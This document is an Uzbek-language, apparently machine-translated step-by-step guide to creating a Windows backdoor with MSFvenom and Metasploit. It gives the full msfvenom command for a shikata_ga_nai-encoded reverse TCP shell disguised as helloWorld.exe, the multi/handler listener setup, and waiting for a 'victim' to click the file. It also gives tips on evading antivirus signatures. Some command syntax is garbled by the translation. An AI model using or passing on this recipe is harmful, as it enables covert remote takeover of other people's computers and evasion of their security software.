Orqa eshik ko'pincha maxfiy va asosan aniqlanmagan holda xavfsizlik mexanizmlarini chetlab o'tish uchun ishlatiladi. MSFvenom -dan foydalanib, msfpayload va msfencode kombinatsiyasi, teskari qobiq TCP yordamida tajovuzkor bilan bog'laydigan orqa eshikni yaratishi mumkin. Orqa eshikni ishlab chiqish uchun har qanday antivirus dasturidan qochish uchun zararli dasturingizning imzosini o'zgartirish kerak. Ushbu loyihani kirish huquqiga ega bo'lgan bir nechta kompyuterda bajaring va shu vaqt ichida siz kompyuter xavfsizligi va orqa eshikning qanday ishlashi haqida ko'proq bilib olasiz.
Qadamlar
Qadam 1. Kalini ishga tushiring va terminal konsolini ishga tushiring
Qadam 2. Interfeysni ko'rsatish va IP manzilingizni tekshirish uchun ifconfig kiriting
Qadam 3. Koderlar ro'yxatini ko'rsatish uchun msfvenom -l enkoderlarini kiriting
Siz kodlovchi sifatida x86/shikata_ga_nai dan foydalanasiz
4 -qadam "msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86/shikata_ga_nai -f exe> helloWorld.exe yozing
- -a x86 -platformali oynalar arxitekturani belgilaydi.
- -p windows/shell/reverse_tcp joylashtirish uchun yuklarni belgilaydi.
- LHOST tinglovchining IP -manzilini belgilaydi.
- LPORT tinglovchi portini belgilaydi.
- -b "\ x00" yomon belgidan qochish uchun mo'ljallangan (null bayt).
- -e x86/shikata_ga_nai kodlovchi nomini belgilaydi.
- -f exe> helloWorld.exe formatdagi chiqishni belgilaydi.
Qadam 5. Metasploitni faollashtirish uchun msfconsole kiriting
Endi siz orqa eshikni yaratdingiz. Jabrlanuvchi helloWorld.exe -ni bosganda, yuklangan qobiq yuklanishi faollashadi va tizimga qayta ulanadi. Ulanishni olish uchun Metasploitda ko'p ishlov beruvchini ochish va yuklarni o'rnatish kerak
Qadam 6. Type exploit/multi/handler
Qadam 7. O'rnatish yuk yuk windows/shell/reverse_tcp
Qadam 8. Modulni tekshirish uchun ko'rsatish variantlarini kiriting
Qadam 9. LHOST 192.168.48.129 to'plamini kiriting
"LHOST" tinglovchining IP -manzilini belgilaydi
Qadam 10. LPORT 4444 to'plamini kiriting
"LPORT" tinglovchi portini belgilaydi
Qadam 11. Run yozing va jabrlanuvchining mashinasidan ulanishni kuting
12 -qadam. Jabrlanuvchi helloWorld.exe -ni bosishini kuting
Shunda siz qurbonning mashinasiga muvaffaqiyatli ulanasiz.
Maslahatlar
- -I dan foydalanish MSFvenomda kodlashning takrorlanishini ifodalaydi. Ba'zida ko'proq takrorlash AV dasturidan qochishga yordam beradi.
- Siz MSFvenom yordamida orqa eshikni yaratishni va kodlashni o'rgandingiz, ammo bu usul bugungi kunda ba'zi AV dasturlariga qarshi mukammal ishlamaydi. Buning sababi MSFvenom -da ishlash andozalari. AV sotuvchilari ushbu andozalarning statik imzosini qo'shishdi va ularni qidirishdi. Ushbu muammoning echimi - boshqa ijro shablonini yoki boshqa vositalardan foydalanish.